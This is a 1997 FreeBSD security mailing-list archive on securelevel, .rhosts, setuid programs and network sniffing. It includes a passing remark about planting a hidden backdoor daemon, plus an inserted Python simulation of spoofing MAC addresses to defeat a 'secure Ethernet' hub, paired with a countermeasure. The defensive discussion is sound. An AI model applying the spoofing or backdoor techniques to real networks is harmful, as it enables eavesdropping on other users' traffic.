-- Winston Churchill, On formal declarations of war

From owner-freebsd-security Tue Jul 29 02:59:31 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id CAA00533 for security-outgoing; Tue, 29 Jul 1997 02:59:31 -0700 (PDT) Received: from haldjas.folklore.ee (Haldjas.folklore.ee [193.40.6.121]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id CAA00527 for ; Tue, 29 Jul 1997 02:59:15 -0700 (PDT) Received: from localhost (narvi@localhost) by haldjas.folklore.ee (8.8.4/8.8.4) with SMTP id MAA24905; Tue, 29 Jul 1997 12:49:14 +0300 (EEST) Date: Tue, 29 Jul 1997 12:49:13 +0300 (EEST)
From: Narvi To: Vincent Poy cc: security@FreeBSD.ORG Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Vincent Poy wrote: > On Mon, 28 Jul 1997, Matthew N. Dodd wrote: > > =)On Mon, 28 Jul 1997, Vincent Poy wrote: > =)> True but if you needed to compile -current, you would need to > =)> remove the schg flags on some binaries before the make world. > =) > =)I was under the impression that doing a 'make world' in multiuser mode > =)wasn't optimal. > > I know but when all the admins are remote, it has to be done > multiuser. Is there a way to push the secure level up to 2 and then push > it down when a make world is needed? NO. Once it is up, it can not be brought down. That's the idea behind it. Sander There is no love, no good, no happiness and no future - all these are just illusions. > > Cheers, > Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ > Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] > GaiaNet Corporation - M & C Estate / / / / | / | __] ] > Beverly Hills, California USA 90210 / / / / / |/ / | __] ] > HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] > > > From owner-freebsd-security Tue Jul 29 03:44:07 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id DAA03309 for security-outgoing; Tue, 29 Jul 1997 03:44:07 -0700 (PDT) Received: from artorius.sunflower.com (artorius.sunflower.com [24.124.0.13]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id DAA03304 for ; Tue, 29 Jul 1997 03:44:02 -0700 (PDT) Received: from localhost (lists@localhost) by artorius.sunflower.com (8.8.6/8.8.5) with SMTP id FAA10176; Tue, 29 Jul 1997 05:43:29 -0500 (CDT) Date: Tue, 29 Jul 1997 05:43:29 -0500 (CDT) 
From: "Stephen D. Spencer" To: Robert Watson cc: security@FreeBSD.ORG Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk

Robert,

That problem is much less prevalent on cable modem systems (or potentially less of a problem :) As a cable-internet ISP, it was decided before we made the service available that there is no reason to give customers shell access to our main servers. It is an obvious requirement of such a network for potential customers to have their own machine. They can configure tcp/ip clients to their hearts' content, and if they really want a *nix shell, there's Linux and the various BSD derivatives. We offer pop3 accounts, but many of our customers have their mail directly delivered to their personal machines. This cuts down on the number of login requests that are being passed over various segments to our main servers.

Also, the cable modems that we use (Zenith Homeworks Universal) operate on a MAC filter concept (limits the number of machines connected to any given modem) and cannot be put into a promiscuous mode by the customer.

-Stephen Spencer admin guy Sunflower Datavision Lawrence, KS

On Mon, 28 Jul 1997, Robert Watson wrote:

> Well, once you have one host, you have all the hosts on the same ethernet
> segment. Typically, though, problems with sniffing occur on college dorm
> networks, which run large numbers of less-well-managed Linux/etc hosts.
> This may be an increasing problem on Cable-modem networks, which I
> understand work something like Ethernet, in that they are broadcast
> networks for a local segment. Also, who is to say that occasionally
> routers or ISP machines don't get broken into, and sniffing occurs? Any
> of your users could be logging in from an untrusted network, so in essence
> you are relying on that network to be secure as well as your own.
From owner-freebsd-security Tue Jul 29 05:32:46 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id FAA08434 for security-outgoing; Tue, 29 Jul 1997 05:32:46 -0700 (PDT) Received: from cyrus.watson.org (robert@cyrus.watson.org [207.86.4.20]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id FAA08423 for ; Tue, 29 Jul 1997 05:32:41 -0700 (PDT) Received: from localhost (robert@localhost) by cyrus.watson.org (8.8.5/8.8.5) with SMTP id IAA06017; Tue, 29 Jul 1997 08:32:21 -0400 (EDT) Date: Tue, 29 Jul 1997 08:32:21 -0400 (EDT) 
From: Robert Watson Reply-To: Robert Watson To: Vincent Poy cc: Brian Buchanan , freebsd-security@FreeBSD.ORG, JbHunt , "[Mario1-]" Subject: Re: securelevel (was: Re: security hole in FreeBSD) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk

On Mon, 28 Jul 1997, Vincent Poy wrote:

> On Mon, 28 Jul 1997, Brian Buchanan wrote:
>
> =)Uh, that would defeat the purpose of securelevel. It's not supposed to be
> =)possible to ever lower it, except when dropping into single-user mode, and
> =)even allowing init to do so in that instance is risky IMHO - a few months
> =)ago I reported a hole, which I believe was fixed, that made it possible to
> =)lower the securelevel by attaching a debugger to init. Even though that's
> =)plugged now, it's still possible that there's another way to fool the
> =)kernel into thinking that process 1 is requesting that securelevel be
> =)lowered.
>
> Anything is possible since nothing is unhackable. Would running
> init at securelevel 2 and then have it reboot multi-user at a lower level
> be possible?

I disagree with the assertion that nothing is unhackable. My toaster is unhackable. :) Depending on how you define hack, of course.

But in a similar vein: you say you have been carefully following the latest version releases, and patching all known bugs. That is not sufficient. A site needs a good security policy as well as patching known bugs. For example, you should have been using ssh the entire time, and have copied the public keys for the hosts to your client machine using sneaker-net. Sending any unencrypted data to/from a host, especially sensitive information like the root password, is an extremely bad idea.

Similarly, careful analysis of the trust relationships between the machines and accounts on the machines is important -- constructing a bad DNS structure can invalidate your whole security design, as if DNS is corrupted, all the .rhosts stuff is vulnerable. Ideally, you would only use .rhosts in combination with SSH, and then make sure that the appropriate keys are in /etc/ssh_whatever, and deny connections that did not match the predefined keys of all hosts. Key distribution is one of the big downsides to SSH, but floppy disks can help here.

Applications like web servers may themselves represent no immediate or known security problems, but oftentimes web servers use third party CGI programs, available publicly in source, or written by a third party for the web server. Many web programs are notoriously sloppy (or ignorant), and this has not been helped by the release of a number of CGI programming books that haven't even touched on the issue of security. It has been shown time and time again that greater access for an attacker increases risk, and most CGI bugs allow shell access to the host, albeit as www or nobody. Even those are problematic. And once someone is into the system, they can get around simple solutions like disabling inetd. In 15 seconds, I can compile and run a daemon that lets me back into an account on a higher port number, and unless you know your tools are good, and how to use them, you won't be able to tell. I certainly won't appear in the logs. :)

In the case of someone else's machine, you probably can't do anything to get rid of the CGI problems, so that really leaves you with just minimizing the risks in the OS. You've already touched on SUID programs -- as many as possible should be disabled. If you have console access, just disable root also, as you can login as root directly. Most programs do not require suid, if you don't mind administrating as root. Su'ing to root is clearly a risky activity, especially if you're logged in unencrypted.
Setting a high secure-level, as well as mounting all file systems w/o setuid support, can make a big difference. Mount all file systems but root as nodev, and things should move along some also. Robert N Watson Junior, Logic+Computation, Carnegie Mellon University http://www.cmu.edu/ Network Security Research, Trusted Information Systems http://www.tis.com/ Network Administrator, SafePort Network Services http://www.safeport.com/ robert@fledge.watson.org rwatson@tis.com http://www.watson.org/~robert/ From owner-freebsd-security Tue Jul 29 05:53:59 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id FAA09782 for security-outgoing; Tue, 29 Jul 1997 05:53:59 -0700 (PDT) Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id FAA09768 for ; Tue, 29 Jul 1997 05:53:54 -0700 (PDT) Received: (adam@localhost) by homeport.org (8.8.5/8.6.9) id IAA12447; Tue, 29 Jul 1997 08:50:07 -0400 (EDT) 
From: Adam Shostack Message-Id: <199707291250.IAA12447@homeport.org> Subject: Re: security hole in FreeBSD In-Reply-To: from Robert Watson at "Jul 28, 97 04:55:19 pm" To: robert+freebsd@cyrus.watson.org Date: Tue, 29 Jul 1997 08:50:07 -0400 (EDT) Cc: adam@homeport.org, vince@mail.MCESTATE.COM, security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL27 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Robert Watson wrote: | On Mon, 28 Jul 1997, Adam Shostack wrote: | | > Vincent Poy wrote: | > | > su really should be setuid. Everything else is debatable. My | > advice is to turn off all setuid bits except those you know you need | > (possibly w, who, ps, ping, at, passwd) | Several mail delivery programs (mail.local, sendmail, uucp-stuff, etc) | require root access to delivery to local mailboxes; crontab related stuff, | terminal locking, some kerberos commands, local XWindows servers, and su | all rely on suid. I know no one who still runs uucp. There are a few holdouts, but most systems can leave uucp off with no pain. Ditto with kerberos. :) Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From owner-freebsd-security Tue Jul 29 06:35:25 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id GAA12622 for security-outgoing; Tue, 29 Jul 1997 06:35:25 -0700 (PDT) Received: from fes3.cs.tol.it (mail.tin.it [194.243.154.39]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id GAA12615 for ; Tue, 29 Jul 1997 06:35:16 -0700 (PDT) Received: from Potenza4-6.tin.it (Potenza4-10.tin.it [195.31.145.201]) by fes3.cs.tol.it (8.8.4/8.8.4) with SMTP id PAA23989; Tue, 29 Jul 1997 15:30:04 +0200 (MET DST) Message-ID: <33DE6FBD.4B7E@tin.it> Date: Tue, 29 Jul 1997 15:33:34 -0700 
From: Rocco Lucia Reply-To: rlucia@tin.it X-Mailer: Mozilla 3.0 (Win16; I) MIME-Version: 1.0 To: Annelise Anderson CC: security@FreeBSD.ORG Subject: Re: security hole in FreeBSD References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk

Annelise Anderson wrote:
>
> On Mon, 28 Jul 1997, John Preisler wrote:
>
> > I'm not convinced that FreeBSD installs a /root/.rhosts by default.
> > None of my boxes have it.
> >
> > -jrp
>
> Neither do mine.
>
> Annelise

sorry for being late ... but... neither do mine

Rocco

From owner-freebsd-security Tue Jul 29 06:40:33 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id GAA13106 for security-outgoing; Tue, 29 Jul 1997 06:40:33 -0700 (PDT) Received: from cyrus.watson.org (robert@cyrus.watson.org [207.86.4.20]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id GAA13096 for ; Tue, 29 Jul 1997 06:40:30 -0700 (PDT) Received: from localhost (robert@localhost) by cyrus.watson.org (8.8.5/8.8.5) with SMTP id JAA06132; Tue, 29 Jul 1997 09:40:16 -0400 (EDT) Date: Tue, 29 Jul 1997 09:40:16 -0400 (EDT)
From: Robert Watson Reply-To: Robert Watson To: Adam Shostack cc: robert+freebsd@cyrus.watson.org, vince@mail.MCESTATE.COM, security@FreeBSD.ORG Subject: Re: security hole in FreeBSD In-Reply-To: <199707291250.IAA12447@homeport.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Tue, 29 Jul 1997, Adam Shostack wrote: > I know no one who still runs uucp. There are a few holdouts, but most > systems can leave uucp off with no pain. Ditto with kerberos. :) Hey! I run Kerberos! :) Actually, the only Kerberos command that requires suid (that I know of) is register, which allows a user on a host to register into Kerberos if they weren't added there administratively by whoever created their account. It's a good migration tool if you have a few servers, NIS, etc, but no risk of overlapping names, but not actually used by very many people at all. In fact, I'm the only person I know of who has ever used it, although I know of quite a few people running Kerberos, especially in academic environments. Register could easily be made suid-something-else, and the keyfile it uses be changed to something-else. Perhaps a kerberos user should be created. Similarly, on the main Kerberos server, the kerberos daemon (and files) are owned by root. The kerberos daemon could be made to setuid() to a kerberos user once the bind() has taken place (plea for a non-root bind!) and run as non-root from then on fairly easily. Just because it's an authentication system doesn't mean it has to run as root. 
Robert N Watson Junior, Logic+Computation, Carnegie Mellon University http://www.cmu.edu/ Network Security Research, Trusted Information Systems http://www.tis.com/ Network Administrator, SafePort Network Services http://www.safeport.com/ robert@fledge.watson.org rwatson@tis.com http://www.watson.org/~robert/ From owner-freebsd-security Tue Jul 29 07:19:55 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id HAA16058 for security-outgoing; Tue, 29 Jul 1997 07:19:55 -0700 (PDT) Received: from rocky.mt.sri.com (rocky.mt.sri.com [206.127.76.100]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id HAA16045 for ; Tue, 29 Jul 1997 07:19:52 -0700 (PDT) Received: (from nate@localhost) by rocky.mt.sri.com (8.7.5/8.7.3) id IAA12042; Tue, 29 Jul 1997 08:19:41 -0600 (MDT) Date: Tue, 29 Jul 1997 08:19:41 -0600 (MDT) Message-Id: <199707291419.IAA12042@rocky.mt.sri.com> 
From: Nate Williams MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To: "Jordan K. Hubbard" Cc: Nate Williams , security@freebsd.org Subject: Re: security hole in FreeBSD In-Reply-To: <6982.870156684@time.cdrom.com> References: <199707290409.WAA10250@rocky.mt.sri.com> <6982.870156684@time.cdrom.com> X-Mailer: VM 6.29 under 19.15 XEmacs Lucid Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Jordan K. Hubbard writes: > > Apparently you've yet to find a clue. Go rub yourself with clue juice, > > and dance the clue dance, and maybe you'll get one. > > Is this based on the famous "you couldn't get a clue if you smeared > yourself in clue-musk and danced naked in a field full of horny > clues during clue mating season" quote? ;-) > The famous (and now missing) Mike Pritchard quote. :) Nate From owner-freebsd-security Tue Jul 29 08:59:29 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id IAA24659 for security-outgoing; Tue, 29 Jul 1997 08:59:29 -0700 (PDT) Received: from GndRsh.aac.dev.com (GndRsh.aac.dev.com [198.145.92.241]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id IAA24654 for ; Tue, 29 Jul 1997 08:59:26 -0700 (PDT) Received: (from rgrimes@localhost) by GndRsh.aac.dev.com (8.8.5/8.7.3) id IAA20259; Tue, 29 Jul 1997 08:59:15 -0700 (PDT) 
From: "Rodney W. Grimes" Message-Id: <199707291559.IAA20259@GndRsh.aac.dev.com> Subject: Re: security hole in FreeBSD In-Reply-To: <5496.870134385@time.cdrom.com> from "Jordan K. Hubbard" at "Jul 28, 97 04:59:45 pm" To: security@freebsd.org Date: Tue, 29 Jul 1997 08:59:14 -0700 (PDT) Cc: vince@mail.mcestate.com X-Mailer: ELM [version 2.4ME+ PL25 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk

[CC: hacked to save a few people extra copies]

> > Well, because I connect to the system using telnet ;) Also, this
>
> That proves absolutely nothing. You think I can't hack a telnetd to
> provide multiple "services?" Wake up, Vinnie! :-)

33 mail messages from ``Vinnie'' this morning in my mailbox, SNR 1:33, I'm not a happy camper :-(.

Vince, I understand you have a security problem; could you please go purchase 3 good books on security (there should be at least 1 or 2 mentioned in the FreeBSD handbook; if not, could someone on the list please provide Vince a list of ORA books on security). I know this mailing list is for FreeBSD security related issues, but the level of the questions and answers being posed here is at the fundamental level of Unix system security and the answers can be found in any good book.

Regards,
-- Rod Grimes rgrimes@gndrsh.aac.dev.com Accurate Automation, Inc.
Reliable computers for FreeBSD From owner-freebsd-security Tue Jul 29 09:26:06 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id JAA26446 for security-outgoing; Tue, 29 Jul 1997 09:26:06 -0700 (PDT) Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (8.8.5/8.8.5) with SMTP id JAA26427 for ; Tue, 29 Jul 1997 09:25:55 -0700 (PDT) Received: from rover.village.org [127.0.0.1] by rover.village.org with esmtp (Exim 1.60 #1) id 0wtF5l-0006nV-00; Tue, 29 Jul 1997 10:25:45 -0600 To: Robert Watson Subject: Re: Detecting sniffers (was: Re: security hole in FreeBSD) Cc: security@freebsd.org In-reply-to: Your message of "Mon, 28 Jul 1997 21:59:39 EDT." References: Date: Tue, 29 Jul 1997 10:25:45 -0600 
From: Warner Losh Message-Id: Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk In message Robert Watson writes: : host. Promiscuous mode simply disables the filter. The only way to : prevent the packets from being sniffable is to prevent them from going on : the wire in question -- smart hubs (switches) do this, so are desirable. Well, there is strong encryption. While it doesn't prevent sniff of the packets, per se, it generally leaves you with garbage and produces the same net effect. Warner From owner-freebsd-security Tue Jul 29 09:35:17 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id JAA27344 for security-outgoing; Tue, 29 Jul 1997 09:35:17 -0700 (PDT) Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (8.8.5/8.8.5) with SMTP id JAA27314; Tue, 29 Jul 1997 09:35:04 -0700 (PDT) Received: from rover.village.org [127.0.0.1] by rover.village.org with esmtp (Exim 1.60 #1) id 0wtFE5-0006oZ-00; Tue, 29 Jul 1997 10:34:21 -0600 To: Vincent Poy Subject: Re: security hole in FreeBSD Cc: Gary Palmer , John Dowdal , security@freebsd.org, JbHunt , "[Mario1-]" In-reply-to: Your message of "Mon, 28 Jul 1997 22:37:39 PDT." References: Date: Tue, 29 Jul 1997 10:34:21 -0600 
From: Warner Losh Message-Id: Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk In message Vincent Poy writes: : I've done that before too... If I don't mention legal action, : they will never respond. I guess they just think it's not their system so : they could care less. We've even pursued legal action against the stupid folks spamming our BIFF port, and they want to fight in the courts rather than fix their @#$@$* config files. Warner From owner-freebsd-security Tue Jul 29 09:53:02 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id JAA28483 for security-outgoing; Tue, 29 Jul 1997 09:53:02 -0700 (PDT) Received: from chaos.amber.org (root@chaos.amber.org [205.231.232.12]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id JAA28477 for ; Tue, 29 Jul 1997 09:53:00 -0700 (PDT) Received: from chaos.amber.org (petrilli@chaos.amber.org [205.231.232.12]) by chaos.amber.org (8.7.5/8.6.12) with SMTP id MAA23141; Tue, 29 Jul 1997 12:52:40 -0400 (EDT) Date: Tue, 29 Jul 1997 12:52:38 -0400 (EDT) 
From: Christopher Petrilli To: Warner Losh cc: Robert Watson , security@FreeBSD.ORG Subject: Re: Detecting sniffers (was: Re: security hole in FreeBSD) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk

On Tue, 29 Jul 1997, Warner Losh wrote:

> In message Robert Watson writes:
> : host. Promiscuous mode simply disables the filter. The only way to
> : prevent the packets from being sniffable is to prevent them from going on
> : the wire in question -- smart hubs (switches) do this, so are desirable.
>
> Well, there is strong encryption. While it doesn't prevent sniff of
> the packets, per se, it generally leaves you with garbage and produces
> the same net effect.

I will note that there are a few people (ODS and Bay Networks included) who make what is called "secure Ethernet", which basically learns what MAC address is on each port, and scrambles frames that are not destined for that MAC. What usually happens is it replaces the data payload with alternating 0/1, and fixes the checksum. It works just fine :-) It's also generally cheaper than a switch.

Christopher

From owner-freebsd-security Tue Jul 29 09:59:43 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id JAA28893 for security-outgoing; Tue, 29 Jul 1997 09:59:43 -0700 (PDT) Received: from biggusdiskus.flyingfox.com (biggusdiskus.flyingfox.com [206.14.52.27]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id JAA28880 for ; Tue, 29 Jul 1997 09:59:40 -0700 (PDT) Received: (from jas@localhost) by biggusdiskus.flyingfox.com (8.8.5/8.8.5) id JAA25886; Tue, 29 Jul 1997 09:57:36 -0700 (PDT) Date: Tue, 29 Jul 1997 09:57:36 -0700 (PDT)
From: Jim Shankland Message-Id: <199707291657.JAA25886@biggusdiskus.flyingfox.com> To: vince@mail.MCESTATE.COM Subject: Re: security hole in FreeBSD Cc: security@freebsd.org Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Vincent Poy writes: > I just verified it and you're right.... I wonder how the .rhosts got > there in the first place. Gee, do you think maybe ... the cracker put it there? Nah. Too obvious. Say, how many email messages have we seen on this thread? The subject line notwithstanding, this is not about a security hole in FreeBSD. The hole is elsewhere. In any event, I'm going to start deleting unread all mail whose subject is "Security hole in FreeBSD"; so, if anyone wishes to report or discuss an actual security hole in FreeBSD, I would be most appreciative if you would use a different subject line for that mail. Thanks in advance. Jim Shankland Flying Fox Computer Systems, Inc. From owner-freebsd-security Tue Jul 29 10:51:56 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id KAA02282 for security-outgoing; Tue, 29 Jul 1997 10:51:56 -0700 (PDT) Received: from destiny.erols.com (root@destiny.erols.com [207.96.73.65]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id KAA02275; Tue, 29 Jul 1997 10:51:40 -0700 (PDT) Received: from destiny.erols.com (vngnce@destiny.erols.com [207.96.73.65]) by destiny.erols.com (8.8.6/8.6.12) with SMTP id NAA17740; Tue, 29 Jul 1997 13:51:07 -0400 (EDT) Date: Tue, 29 Jul 1997 13:51:06 -0400 (EDT) 
From: John Dowdal To: Gary Palmer cc: Vincent Poy , security@FreeBSD.ORG, JbHunt , "[Mario1-]" Subject: Re: security hole in FreeBSD In-Reply-To: <2482.870154831@orion.webspan.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk

On Tue, 29 Jul 1997, Gary Palmer wrote:

> Vincent Poy wrote in message ID
> :
> > I've done that before too... If I don't mention legal action,
> > they will never respond. I guess they just think it's not their system so
> > they could care less.
>
> Don't think that about Erols until you try ... I know the person who
> answers the abuse mail. I think he'd be offended by that statement.
>

I have had very good response from erols a couple weeks ago when reporting a hacked account which was used to harass people on IRC (he de-activated three accounts). I simply sent accurate /whois and date/time info to abuse@erols.com and got a response within minutes. Cool guy :)

When I mentioned legal action, I was referring to the phone, not email. When you call their support number, they have a lot of clueless kids who read scripts. They are well-trained not to pass calls on to important people. IMHO, this is their biggest problem, but I don't know if I could really do better given the number of windoze lusers they serve.

TS: Is your modem plugged into the phone line?
LU: Modem? What modem?
TS: You need a modem and a phone line to use our service.
LU: Whats that?

or

LU: I call the access numbers and hear funny noises
TS: You need to call the access numbers with your computer's modem.
LU: Mean I need a computer to access your service!?
John From owner-freebsd-security Tue Jul 29 12:08:04 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id MAA06406 for security-outgoing; Tue, 29 Jul 1997 12:08:04 -0700 (PDT) Received: from critter.dk.tfs.com (critter.phk.freebsd.dk [195.8.133.1]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id MAA06364 for ; Tue, 29 Jul 1997 12:07:55 -0700 (PDT) Received: from critter.dk.tfs.com (localhost [127.0.0.1]) by critter.dk.tfs.com (8.8.6/8.8.5) with ESMTP id VAA00286; Tue, 29 Jul 1997 21:06:13 +0200 (CEST) To: Christopher Petrilli cc: Warner Losh , Robert Watson , security@FreeBSD.ORG 
From: Poul-Henning Kamp Subject: Re: Detecting sniffers (was: Re: security hole in FreeBSD) In-reply-to: Your message of "Tue, 29 Jul 1997 12:52:38 EDT." Date: Tue, 29 Jul 1997 21:06:13 +0200 Message-ID: <284.870203173@critter.dk.tfs.com> Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk

In message , Christopher Petrilli writes:
>On Tue, 29 Jul 1997, Warner Losh wrote:
>
>> In message Robert Watson writes:
>> : host. Promiscuous mode simply disables the filter. The only way to
>> : prevent the packets from being sniffable is to prevent them from going on
>> : the wire in question -- smart hubs (switches) do this, so are desirable.
>>
>> Well, there is strong encryption. While it doesn't prevent sniff of
>> the packets, per se, it generally leaves you with garbage and produces
>> the same net effect.
>
>I will note that there are a few people (ODS and Bay Networks included)
>who make what is called "secure Ethernet", which basically learns what MAC
>address is on each port, and scrambles frames that are not destined for
>that MAC. What usually happens is it replaces the data payload with
>alternating 0/1, and fixes the checksum. It works just fine :-) It's
>also generally cheaper than a switch.

Except that most of them are easy to spoof: Set up your sniffer to output 10 packets with different "from" MAC and it figures "hey port #4 is upstream, send it everything..."

-- Poul-Henning Kamp | phk@FreeBSD.ORG FreeBSD Core-team. http://www.freebsd.org/~phk | phk@login.dknet.dk Private mailbox. whois: [PHK] | phk@tfs.com TRW Financial Systems, Inc. Power and ignorance is a disgusting cocktail.
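The learning-hub spoof Poul-Henning describes above, as an added example that is not part of the original thread and not the firmware of any vendor's product: a small Python model of the "secure Ethernet" repeater Christopher Petrilli outlined (learn which MAC is on which port, repeat every frame to every port, scramble the payload on ports that do not own the destination MAC), fed first with a legitimate client-to-server frame and then with a burst of frames whose source MAC is forged to be the server's. The port numbers, MAC addresses, the telnet-style login payload and the 0x55 scramble pattern are all constructed for the example. The `sticky` option, which refuses to move a MAC it has already learned onto a different port, is the port-security style countermeasure one would want on such a hub; it is an assumption of this model, not a claim about what the ODS or Bay Networks products did.

```python
from collections import defaultdict

BROADCAST = "ff:ff:ff:ff:ff:ff"


def scramble(payload):
    """Stand-in for what the thread says the hubs do to frames a port should
    not see: same length, data replaced with an alternating 0/1 bit pattern
    (0x55).  The checksum rewrite is left out of this model."""
    return b"\x55" * len(payload)


class SecureHub:
    """Toy 'secure Ethernet' repeater.  It learns the source MAC seen on each
    port and repeats every frame to every other port, scrambling it on ports
    that do not own the destination MAC.  With sticky=True a MAC already
    learned on one port is never moved to another (port-security style;
    an assumption of this example, not a feature the thread attributes to
    any product)."""

    def __init__(self, nports, sticky=False):
        self.nports = nports
        self.sticky = sticky
        self.port_of = {}        # mac -> port that currently owns it
        self.violations = []     # (port, mac) pairs the hub refused to relearn

    def learn(self, port, mac):
        known = self.port_of.get(mac)
        if known is not None and known != port and self.sticky:
            self.violations.append((port, mac))
            return False
        self.port_of[mac] = port   # a naive hub happily moves the MAC
        return True

    def transmit(self, ingress, src, dst, payload):
        """Deliver one frame.  Returns {port: bytes that port's NIC sees};
        an empty dict means the hub dropped the frame."""
        if not self.learn(ingress, src):
            return {}
        seen = {}
        owner = self.port_of.get(dst)
        for port in range(self.nports):
            if port == ingress:
                continue
            # Broadcasts and still-unknown destinations are flooded in clear
            # (assumption of this model); everything else is scrambled on
            # every port except the one the hub believes owns dst.
            if dst == BROADCAST or owner is None or owner == port:
                seen[port] = payload
            else:
                seen[port] = scramble(payload)
        return seen


def run_attack(sticky):
    """Replay the spoof from the thread against a hub.  Returns
    (attacker sees cleartext before, attacker sees cleartext after,
    server still receives cleartext after)."""
    server, client, attacker = ("00:00:0c:00:00:01",    # constructed MACs
                                "00:00:0c:00:00:02",
                                "de:ad:be:ef:00:04")
    SERVER_PORT, CLIENT_PORT, ATTACKER_PORT = 0, 1, 4
    hub = SecureHub(nports=5, sticky=sticky)
    # Each host announces itself once so the hub learns the real topology.
    for port, mac in ((SERVER_PORT, server), (CLIENT_PORT, client),
                      (ATTACKER_PORT, attacker)):
        hub.transmit(port, mac, BROADCAST, b"who-has")
    secret = b"login: root\r\nPassword: s3cret\r\n"   # constructed payload
    before = hub.transmit(CLIENT_PORT, client, server, secret)[ATTACKER_PORT] == secret
    # Poul-Henning's spoof: a burst of frames whose source MAC is the server's,
    # so a naive hub concludes the server now hangs off the attacker's port.
    for _ in range(10):
        hub.transmit(ATTACKER_PORT, server, BROADCAST, b"")
    seen = hub.transmit(CLIENT_PORT, client, server, secret)
    after = seen[ATTACKER_PORT] == secret
    server_ok = seen[SERVER_PORT] == secret
    return before, after, server_ok


if __name__ == "__main__":
    print("naive hub  :", run_attack(sticky=False))
    print("sticky MACs:", run_attack(sticky=True))
```

Against the naive hub the second client-to-server frame arrives in clear on the attacker's port and scrambled on the server's own port, which is the "send it everything" outcome above; with sticky learning the forged burst is dropped and recorded in `hub.violations`, and the server keeps receiving its traffic. Whether a real hub relearns on every frame is exactly the property to test before trusting one in place of a switch.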
From owner-freebsd-security Tue Jul 29 12:30:29 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id MAA07524 for security-outgoing; Tue, 29 Jul 1997 12:30:29 -0700 (PDT)
Received: from shell.monmouth.com (root@shell.monmouth.com [205.164.220.9]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id MAA07516 for ; Tue, 29 Jul 1997 12:30:26 -0700 (PDT)
Received: from i4got.lakewood.com (fh-ppp17.monmouth.com [205.164.221.49]) by shell.monmouth.com (8.8.5/8.7.3) with ESMTP id PAA26631; Tue, 29 Jul 1997 15:28:01 -0400 (EDT)
